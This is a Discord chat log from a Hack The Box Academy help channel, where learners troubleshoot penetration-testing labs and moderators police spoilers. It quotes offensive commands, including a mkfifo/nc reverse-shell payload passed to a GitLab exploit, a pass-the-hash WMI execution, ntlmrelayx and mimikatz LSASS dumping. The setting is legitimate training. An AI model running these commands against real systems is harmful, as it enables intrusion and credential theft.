been a bit slower than usual for me too recently, though I don't think it was that bad yet? don't think it's 10 minutes

Seems it timed out and I clicked spawn again which created < 60s so I guess it was having a moment

@digital pendant be careful with sharing images that contain answers

idk what I shared now but my bad

Hello, have anyone completed Hacking wordpress module?
actually having problem with the question -> Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

your screenshot contained the answer to a question in it; that's all lol literally just the answer in the box

https://tenor.com/view/homer-simpson-les-simpson-matt-groening-ouff-non-gif-11592092171817688539

Lesson learned!! thanks Marcie

was about to ping you here, this is the best place for your questions, be careful with DMing people 👍

I got dm'ed too it seems.

I have not btw

don't dm users without asking per the #rules; if someone wants to dm to assist you, they'll offer

ok sry will not happen further

Hello, I have a question on Attacking common services, the Attacking Email Services, can someone give me a hint on finding the password?

@mighty shell which specific section of the wordpress module are you stuck on ?

Cause since i received some Dms asking for help so i thought theirs nothing wrong in it, sorry my bad @fathom pendant

I just finished the Pasword Attacks Lab - Easy ,
How long did it take for you to crack the password and how many threads have you used ?

@digital pendant The skill assesment part

@digital pendant I got the Shell of erika but couldn't figure out where the flag for this question is
Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

I can't give you the answer but try to be aggressive with your scans... from there you should see what is vulnerable and how to abuse this

Doing the AD Administration: Guided Lab Part II at the moment, where 2 boxes are spawned.
https://academy.hackthebox.com/module/74/section/1393

The first target works, the second, a domain controller does not, with the same credentials.

Target(s): 10.129.x.x (ACADEMY-IAD-WIN10) ,10.129.x.x (ACADEMY-IAD-DC01)

RDP to 10.129.x.x (ACADEMY-IAD-WIN10) ,10.129.x.x (ACADEMY-IAD-DC01) with user "image" and password "Academy_student_AD!"

Thats the output when i try to connect the DC:

└╼smp$xfreerdp /v:$TGT /u:image /p:'Academy_student_AD!' /dynamic-resolution
[18:39:43:052] [56729:56730] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[18:39:43:052] [56729:56730] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[18:39:50:167] [56729:56730] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[18:39:50:167] [56729:56730] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[18:39:50:167] [56729:56730] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[18:39:50:167] [56729:56730] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

I've acepted the certificate on my first connection attemp already. I'm not sure if the domain name should match the one from the section. In the section is says ACADEMY-IAD-DC01 but i get ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL in the cert.

Check Resources

the logon failure isn't a problem with the certificate

LOGON_FAILURE is an issue with the username/pw

I use the passwordlist from the ressources

But can I use Hydra or do I have to use o365spray?

Have you found the correct username? Started with M.....

hydra works

hydra worked for me

o365 is more specific to office 365

Yeah, just wonder why the computer name is different in the cert as in the section. Non the less, i only see one pair of credentials and it works only for one of the two target machines :/ Already terminated the session and recreated it.

okay I will try hydra again thanks 🙂

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

-t 12 worked for me

Can I use the command from the lecture? 😮

Can i Dm you if you don't mind?

Sure @mighty shell

Hello! i do have a question part of the penetration tester path - Web Enumeration. Anyone working on?

Can I dm you to check my hydra command?

https://dontasktoask.com/

hi, can anybody help me with noctural box?

anyone free to help me on the advanced xss skills assessment part please? I can browse to my payload and trigger a chain that causes a user to be promoted. But when I put it into a payload on the exploit server and send to victim it always asks for a login, when I try xhr with credentials it gets blocked.

I tried adding a DNS Server 1.1.1.1 to the /etc/resolv.conf file, so the target the domain will be inlanefreight.com but won't save?

Yes

think I may have got it now 😄

#1360673885376483378 read and follow #welcome instructions to access it

why are you messing with the resolv.conf file?

yea already done

okay so the payload works when I view it, but when I send to victim it doesnt work ?

I know that this doesn't belong here but i don't kow where to ask. I want to do the starting point machines on the main htb site but i can't spawn any machine. Can anybody help?

#starting-point <—

you have to connect with openvpn first or start a machine

i did that

it says i can't access this channel

I found I was performing a bit of a schoolboy error and forgetting to remove to remove newlines from the output prior to encrypting it...once I did that it worked for me

Read and follow #welcome to get access

completely forgot to do this when i've joined the channel thanks!

@fathom pendant

Hi

Can someone teach me how to hack.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

see article above

Can you hack using a phone?

even if you could, you're better off using a PC..

I am on the CPTS path and at the Attacking Common services. at the 3 last exerciese labs Easy, Medium, Hard. Is it me or is the EASY lab quite hard . I am scared of starting the Medium and Hard ones hahaha

Can someone save me?

academy.hackthebox.com/module/147/section/1638

Question: Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

Steps Performed:

1)Using Julio’s hash, performed a Pass the Hash attack, launched a PowerShell

2. Created payload(powershell64) via https://www.revshells.com/ IP: 172.16.1.5 Port: 8888

3)In powershell Import-Module .\Invoke-WMIExec.ps1

4. Invoke-WMIExec -Target 172.16.1.10 -DOMAIN inlanefreight.htb -Username julio -Hash <Julio hash> -Command "<Generated payload>"

5. listener that is running CMD not receiving the shell via nc listener on port 8888

What am I doing wrong?

i am getting an error message of there are no available instances

okay we up

Anyone done the advanced xss & csrf module wana give me a hand? I can make the payload work on myself and it attempts to promote the user correctly, but when I send it to the victim, my user isn't promoted? Ive used the open redirect etc..

do you recommend completing all tier 0 modules (given that they are effectively free)?

I don't see a reason not to! I pretty much love all of the academy stuff, and that's certainly a good place to start!

there's a wide breadth of knowledge that they cover, however some of the modules step over each other and cover essentially the same thing (same topic but more generic); it wouldn't hurt but it would take a while

oh wow, yeah I just checked, there's a lot more Tier 0 in there than I thought!
But I mean, before committing to a subscription, might as well.

Personally I feel like I should've started with paths much sooner though, as dumb as it sounds, but I figured that out only later - that all those basic things like "how do I actually connect to a machine through PwnBox" are explained somewhere, and you don't HAVE to fumble your way through everything ^^

As I remember, when first signing up on HTB, it was not as obvious where to start, I remember being a bit overwhelmed. My excitement kept me going, just could've saved a few "duh" moments

hi everybody, i just joined the discord community beacuse i got some problems with "Linux Fondamentals". Can i ask here or there is a specific channel or # where i can ask for help. Thankssss

hey, can i dm someone about the last question in the Android Fundamentals module ? im asked to sign an .apk file on android studio but i get errors

module questions are best asked right here 🙂

Hi, in AV Evasion Dynamic Analysis section, I am trying to use the AES technique but I am getting this error

Hi, does anyone know why in the Attacking Common Services module, in the Attacking FTP section, when asked “What username is available for the FTP server?” the answer anonymous does not fit, although clearly anonymous login is possible. Can anyone tell me what I'm doing wrong?

okay now i did by myself but i will ask for sure for some help. Thank you

because there's an actual username available

does anyone know where i can ask for direction on a machine i'm doing?

it says no access for me

👁️

thank you 🙏

I'm in shells & payloads - the live engagement. I've been trying for days to get this to work. I create a payload and upload it to the server, but I keep getting an error page on the server: HTTP Status 500 – Internal Server Error. What am I doing wrong?

is this the correct format or am i tripping?

mmmm...not sure about that 3 after xfreerdp, and never seen quotes around the password

if always been using xfreerdp3

and quotes because otherwise it thinks the ! is a command

never mind

now it works, i guess i had to wait like 5 min until the target fully loaded

Hey

this also didn't work for me.. I used (like you already tried) cURL to get the flag

Hey pals ,
I am doing Information gathering web edition , And I have been stuck at this third question in the skill assessment

What is the API key in the hidden admin directory that you have discovered on the target system?

I later retried the question using ligolo-ng (which is not covered, but I highly recommend checking it out) and managed to load it up

Sweet thanks. Maybe a buggy lab? I know ligolo-ng well and love it! I’m doing this course as a review and to gain a new perspective.

I think that could be the case.. all the forum posts I found didn't result in anything.. And checked every step to make sure it should work..
Maybe there is still a 1% chance that I fucked something up and will never know..
So yeah, sorry can't help

I guess all that matters is the cURL worked. I’m pretty confused as to why proxychains or foxy proxy didn’t work.

hi on the socat redirection with bindshell section of pivoting tunneling and port forwarding module I am doing the exact instructions and the shell successfully establishes but then dies immediately preventing me from actually getting a bind shell. I tried using versions of the exploit for linux and windows and tried playing with it and I come closest when following the exact instructions as that's the only way it doesn't get blocked.

what am I doing wrong? by the way, I hope I'm not spoiling too much I'm trying to be vague here.

but I played with IP addresses and port numbers and it appears like I am supposed to just follow instructions and the way the instructions say makes the most sense when I research it

like I think I understand the instructions too

Does anyone have any idea how to terminate my vpn connection in htb I closed the terminal reset the page even restarted the vm but no luck says I have 2 connection

maybe you have a "dead" interface which didn't get terminated correctly. Check with ifconfig if you see something like tun1 or tun2 (tun0 should be default vpn)

Yeah i have tun0 but I can't seem to terminate it

I tried reseting the target host and it still won't work

I have a screenshot in case anyone wants to see it

sudo killall openvpn

Never close a terminal with a running process. Always terminate the process before closing

Any one here solved assembely module ?

I did

Any tips on nocturnal

Ok i will send you private
Check the dm

#1360673885376483378 read and follow #welcome to access

Intro to Sliver module question 1 fo Domain Recon section: + 1 Submit the relative identifier of the SID for user websec
i submit the user SID and Incorrect answer

because it's asking for the RID; not the full SID

the RID is the last set of digits

anyone care to help on the very last part of the advanced XSS skill assessment? can't seem to wrap my head around this sql part

wow i can't read

thanks

hi anyone able to help me out with the current bindshell section I'm on?

Hello apologies if this has been asked before but I am currently in the HTTP Headers section on the Web Requests module, and do not see the flag file that is to be loaded. I only see JavaScript and fonts.gstatic files. Do I need to check the js files for the flag?

If you're still stuck you can DM.

can I DM you now?

like are you available to help? I have a screenshot of everything

@gray yacht or are you available later tonight or tomorrow any time?

Yes, I can assist if you still need it

Going way back in the chats, but it looks like you put in an erratum for the file transfers module, living off the land lesson because of the certreq.exe -Post command. On the enterprise version at least it has not been corrected. It seems like the changes don't always carry across to the enterprise version.

In Network tab you can see that the flag is loaded in File section where others files like favicon and .js are loaded. Sure you unable to see it?

r1cky said he’d help me later tonight

I’m taking a break until then

You need to check for VHOSTs and enumerate it further.

i believe module updates are synced between Academy and Enterprise. so it may not have been changed at all

not staff though, so i can't confirm

oof. well i'll begin the fun journey of trying to figure out how to finish this module. I only see one person who's made the same comment as mine and it was two years ago.

Thanks tho

Hey marcie havin some trouble with this, think maybe you could help me out

Any errors?

no we good

I blocked the content and tried to keep only the relavent bits. If that's still not allowed, plz delete the picture

Just use words.. no need to post the pic. It's still revealing content from the module.

how does this command do NTLM relay attack if the hash isn't in the command impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

it acts as a server and receives the hash then relays those creds to different protocols

i'd have to wait for the user to authethicate again though, no?

the whole thing is explained here

https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py

It'd be pretty rare to even use nc to transfer files IMO since there's better ways, if you absolutely have to then yes you can have the target connect back to the attacking machine using nc.exe to send a base64 of a file to your listener

I purchased nitro as I just started using Discord and can't figure out how to get emoticon by the side of my name

It depends on the roles you have in a server

Don’t need nitro for it

I usually don't use servers like these ever since the fed.

I checked that
And found 1 vhost , further scan revealed additional vhost
Added in the hosts file ,
Got the email and api key
But that answer is wrong

Maybe I can assist you

@storm elk Why did you do that

Moderator Badges are not the same

🛡 and and the administrator badge is different colors

assist with what? you're not even verified how can you assist with modules?

Lol. You just made yourself an invalid name. Read #rules

We don't do that here.

How do I change my name back

You read and follow #welcome

Done

You didn’t follow the three simple steps.

Otherwise your name would’ve changed

I changed it i apologize

Also I sent over leads to close out that module

To close out that module?

What are you talking about?

Not for you HTB Work here

I don't think this is the server for you. This server is for discussion about Hack The Box's various platforms. Take your general talk to #general, access it by following the instructions in #welcome, and don't advertise your own services.

It is HTB

Hacking The Box

No services are being sold or advertised

Okay great, take the chatter to #general please

Just guidance for others to complete HTB Modules which I have done years ago!

It won't allow me to chat in #general

That's because you still haven't followed the instructions in #welcome.

Re read what if my HTB account is about 2 decades old

Considering HTB was created in 2017, that's not true. I'm tired of this, verify your account by following the instructions and move the chat to #general. This channel is for module discussion only.

Yes almost 9 years ago

Hi, can you please tell me how to find the actual username? I can't figure out how to find

There is actually two questions regarding that api key

Q3. What is the API key in the hidden admin directory that you have discovered on the target system ?

And

Q5. What is the API key the inlanefreight.htb developers will be changing too

I got the right answer for Q5 but i am stuck at Q3

Edit : nevermind I solved that

You're account just pasted 2 months old on Discord. And I don't appreciate suspicious accounts friend requesting me out of the blue. Especially when you're name in my request is LulzSec and here it is Jack McVerify? And considering that you're having trouble figuring out how to use Discord properly. 🤣 Not a good sign!

I don't utilize Discord. As their encryption is bypassable I've done it before as a finely penetrative test to test their encryptions.

I utilize tools such as "JanaPC" a real hacker hides their identity not reveal their identity.

My name was switched due to "Server" Rules.

I'm an OG to this Hacking game 🎮

https://tenor.com/view/orange-fish-spognebob-phone-gif-3064144843174203984

This guy 😂

Module: Attacking Common Applications
Section: Attacking GitLab
Challange: Gain remote code execution on the GitLab instance? Submit the flag in the directory you land in.

My Question: When I run below command with different users (authenticated e.g. my own created user or new discovered) I am getting an error message, that the djvumake is not installed, which is one of the dependecies djvulibre-bin packages. Is the goal to use a different payload then one presented in the module?
-> python3 49951.py -t http://gitlab.inlanefreight.local:8081/ -u sxxx -p 'Passxxx' -c 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.xx.xx 8443 >/tmp/f'

[1] Authenticating
/home/xxx/49951.py:35: DeprecationWarning: Call to deprecated method findAll. (Replaced by find_all) -- Deprecated since version 4.0.0.
token = soup.findAll('meta')[16].get("content")
Successfully Authenticated
[2] Creating Payload
djvumake not installed. Install by running command : sudo apt install djvulibre-bin`

Thanks HackTheBox.

I.. don't think that's us?

it is

Where?

Honestly.. purple

How did marketing not throw a fit

🤣

All good, just didn't recognise it

Dashboard in Academy.

Fair enough

hey guys noob question here
how can I take detailed notes while going through the cpts modules

There is no golden way to do it. But a lot of people here use Obsidian and save notes per module

Start organizing your notes with clear headings like module name, date, and key concepts. Bullet points for definitions, code descriptions, and common use cases. Highlight exceptions or important details, and try to summarize each section in your own words to reinforce understanding. Diagrams or flowcharts for complex concepts can help. Also make sure to review your notes regularly to keep the information fresh in your human CPU.

For the software, I use Obsidian myself, but there's a lot of options to choose from.

thank you guys

Hi, In the module Pivoting, Tunneling, and Port Forwarding , in the section of RDP and SOCKS Tunneling with SocksOverRDP. I'm struggling hard to get the flag, I have everything set up but when attempting the RDP it fails probably due to the Firewall. There is a hint (Jason is a local account and a Defender may try to stand in your way.), but I cant think of a way to bypass de defender.

Anyone can help?

Where do i report a typo in one of the modules?

#1234357888114364508

You can disable defender

But How can I disable the defender for the target machine if i don't have acces?, Or I only have to disable the defender of the pivot machine?

Can not solve this one even though i followed everything " Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)"

If I recall correctly you only need to disable it on the pivot machine

I have a hard time with Credential Hunting in Windows questions.
I downloaded the Lazagne repo and im trying to make it work on the target Windows system but nothing seems to be working.
I already tried making the executable file on BOTH Linux and Windows but it only gets created on Linux (because python is installed there).
I searched a little and to make an executable file on Windows target I need to run the following command pyinstaller --onefile -w lazagne.spec but the problem is Python is NOT installed on the target system
what can I do to make it work?

You can look for pre-compiled binaries although I'm pretty sure there's one in /opt/tools or C:\tools iirc

where can I look for pre-compiled binaries haha

google

https://github.com/AlessandroZ/LaZagne/releases/

there's literally an exe available

they are usually in the releases

bruh, im just stupid fr

thx

0xW1LD provided a link for ya

ye, got it, thx again! ❤️

Hi all,

stuck on Windows Privilege Escalation SeDebugPrivilege, get an error when using mimikatz method and no output at all when using psgetsys.ps1.
Mimikatz output is as follows

'mimikatz # privilege::debug
Privilege '20' OK

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)'

Psgetsys output is as follows

'PS C:\Users\Jordan\Desktop> .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(4140,"cmd.exe","")
PS C:\Users\Jordan\Desktop> .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(4140,"c:\Windows\System32\cmd.exe","")
PS C:\Users\Jordan\Desktop>'

Can someone help with this please?

I've searched the issue in discord but can't find any helpful material

Can not solve this one even though i followed everything " Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)"

Did you use procdump to create the dump file from an elevated session?

Thank you so much for your response, now i have a better understanding 👍😄

Hi, sorry I couldn't answer earlier but that's not true. In the module Attacking Enterprise Network the lesson shows the hosts file and they don't have the http:// prefix. Plus, eyewitness actually offers to prepend http or https with flags. To finish, I've run successfully eyewitness before and I've managed to do it before with and without the prefix.

I can't put my finger on why exactly eyewitness works sometimes and doesn't work most of the time, I'm suspecting it's due to selenium or browsers errors.... Adding the http:// prefix doesn't solve my issue here.

I did but that didn't work for whatever reason, i follwoed both methods exactly to no avail. However just noticed the note advising there is a new psgetsys script and that has worked for me. Thank you anyway!

If that lssas.dmp is not located in the same directory you are executing mimikatz from you either need to move it into that directory or provide the path to that lsass.dmp file, i.e., mimikatz # sekurlsa::minidump C:\path\to\the\lsass.dmp as the next mimikatz command is opening that file for the minidump.

If you're not understanding, you can DM.

Anyone wana help me on the advanced xss and csrf part? Im struggling on the last sql injection part

So I've found the additional endpoint and I can get data back with 1'1=1 etc..., it shows two columns, but when I inject into either of them I get {"error":"Something went wrong"}, anyone done the advanced xss and csrf skills assessment can help ?

Hi, I've started the Pentest in a Nutshell module, and in the topic 'Linux System Enumeration'.

When I try to install linpeas from github, the connection on the virtual machine always times out. Any way out for this thing?

the answer is the first part of the spoil

Ah i see fair enough, that must have been the issue then. Thanks for clarifying!

Can anyone help me? I know what the benefit of open ports is.

guys and help in this ??

don't spoil info for modules above tier 0

Hey guys, I'm working on the first assessment in AD attacks & Enumeration module and I got stuck, can anyone help?
I don't want to spoil the answers but I'd be glad to discuss it in DMs.

Hi

Module: Windows Privilege Escalation
Section: Pillaging

I am reading the text on mRemoteNG. It says that we can crack either Protected attribute or Password attribute. But I don't understand how we can do that when we don't know the master password?

After seeing the above message I thought I'd make mine similarly better 😅
Module: AD Enumeration & Attacks
Section: Skill Assessment 1

Answered the first 3 questions and now onto the 4th.
(Submit the content of the flag.txt file on the Administrator desktop on MS01).
I'm stuck at this level, appreciate any kind of help

You can DM

Can anyone help me? I am looking for anyone who has worked in the digital forensics field for a mentorship project I am working on. I’m just looking to ask a couple basic questions about the work you do and what your path to getting there might have looked like. If anyone knows someone that can help please send them my way. Thanks

This isn't #general; read and follow #welcome to access, there's also #forensics-cryptography or even #1024429874246590575

If it's a career related question: #careers-and-certs

Just a follow-up to some questions that I've asked earlier, I've had trouble with running eyewitness at all because of invalid headers issue, I've had trouble with aquatone because it wouldn't manage to take screenshots (error 21 or something) and I've now found gowitness which I've found works very well (on my arch linux set up at least) so if anybody has trouble with screenshot tools, I recommend trying gowitness

has anyone done the advanced xss & csrf can dm me please?

Hello all, I have a technical issue I was hoping to get some help with. I am in the Getting Started module for the Pentesting pathway in Academy.

I have had consistent issues when on a target system to getting network traffic from my attacker. E.g., revshells never connect, I dont see any traffic in my http server logs when performing a request, etc. Scanning the target system or interacting to it from attacker are not an issue.

I have also used ports that are known to be open on the target.

I am using my tun0 address and have disabled my firewal. My VM is using a NAT connection. I have also toggled between the UDP and TCP ovpn packages and switched VPN servers with no change in behavior.

Does anyone have some ideas of the issue here?

It helps when you say which section you're working on

If it's a public_ip:port; revshells won't be available

my bad, this is on 'Nibbles - Initial Foothold' but I experienced the same issue earlier in the module

Also it wouldn't be http connections for revshells, at least not typically

to clarify, the http traffic expected is from http requests from the target (getting a revshell payload over for example)

As far as issues, making sure you have the right ip for the revshell, and the tight port

Thats not always the case, actually

You can trigger the payload over http: but it doesn't use http to call back

in these cases I mean that I request a transfer to transfer to target from attacker to then execute on target via wget or similar

Also: don't use your own vm and the pwnbox at the same time

This is a common enough issue

I dont use the pwnbox. So it seems any traffic (revshell or http requests) do not make it back to attacker for some reason

¯_(ツ)_/¯

I've never had issues so I couldn't tell you where to pinpoint the issue at

Most pentest distros don't have a firewall on by default

right, it's a confusing issue. Havent had it with HTB boxes or with other lab environments such as Offsec

back to google...

thank you for your time though

Try changing vpn regions to regenerate your vpn file

And making sure you don't somehow have multiple connections going

sudo killall openvpn

Just boosting it again 🤐

I'll give it a shot, thanks again

Read the section again, it tells you a master pw

Can I DM you?

It also tells you the location of the configuration file

Not taking dms for these modules

I will try to put forward without spoiling the content as much as I can.

So, in case of DPAPI encryption, its straight forward. But when the config file is protected by user chosen password, it is shown to apply for loop. But how does one verify when it doesn't know both the config master password and decrypted remote service password?

mRemoteNG has a hardcoded master password unless changed by the user

It's mentioned as Marcie says

Is there any way to send a file from my machine to the PwnBox ?
Copy-Paste doesn't for a reason.

@fleet jay No. This discord is about HackTheBox and the various platforms.

Ok thanks

anyone want to help me on the advanced xss skills assessment please? almost done it but can't get payload to exfiltrate data at end keep getting error

The section mentions both

Password attacks section 2

Idk if its a typo or theyre 2 seperate things

Secur32.dll, not Secure32.dll.

It’s commonly associated with the SSPI used for auth protocols and services.

Likely a typo.

got it

hello , im doing some modules and got some problem. The problem is that there is an zip arhive i need to download and open. But im using HTB virtual Parrot. How can i drop this zip on vm? or maybe there is another way to got archive

Any help

You can DM if you'd like, I have a little time.

Sure, thanks.

@strange pivot Please don't post content from modules above tier 0

ok my bad

am I on the right track then 😄 ?

right-click -> copy download link -> wget <paste link>

I have a dumb question lol

Trying to do this module Analyzing Evil With Sysmon & Event Logs, but how do i get to a windows machine, should i be using the open vpn connection with a copy of vmware ?

tytyty!

Dear team, the module Introduction to Windows Evasion Techniques contains some issues and it is difficult to complete each lab due to some errors, kindly check it.

It’s just a particular type of check that allows you to have a reverse shell. It’s a bit painful, but should be working

I tried every thing in the module and it did not work

Which section?

both Process Injection & Dynamic Analysis

Iirc the dynamic analysis section will depend on which approach you take for your code as all the section run a check with a specific signature

I can check my notes if I have the code I used (which should not be too far from what’s in the module)

please take discussion to DMs to avoid spoilers

So if im trying to connect to a windows machine for a lab ; how am i supposed to be connecting to that, the RDP doesn't work , and if i go into pwnbox wihich is a linux system , and rdp the internet doesn't work there, and i have to install sysmon

i dont know much about this but you should use xfreerdp to access it

or you can just ssh to the box

Still need help?

it depends on the situation

the labs will tell you how they expect you to connect, most of the time

well im trying to do this Windows Event Logs & Finding Evil

which gives me a target, but i can't rdp from my personal computer to that rdp

You'd need to get VPN access

Or use the Pwnbox

yeah i have the vpn installed, the pwnbox is linux though

and i can rdp to a windows device from the pwnbox

but theres no internet to install the sysmon

it should already be installed

C:\tools is typically where most tools are for academy targets

and typically this location is told to you in the reading

Hey, struggling with the last question here https://academy.hackthebox.com/module/267/section/3048 (Introduction to SCCM). I got creds for 3 accounts. None of them has administrative privileges. Can I DM someone on this?

Why you always typing here when you can DM me and you know this

lol

i tried to open the C: drive with it and it says this app cant run on your pc

why windows rdp fro windows log disconnect constantly

i checked my connection its pretty stable

tried changing vpn servers and in middle of my Skills Assessment it disconnected

3 times

/auto-reconnect

hola, alguien de Habla hispana que me ayude en unos problemas que tengo al conectarme al vpn?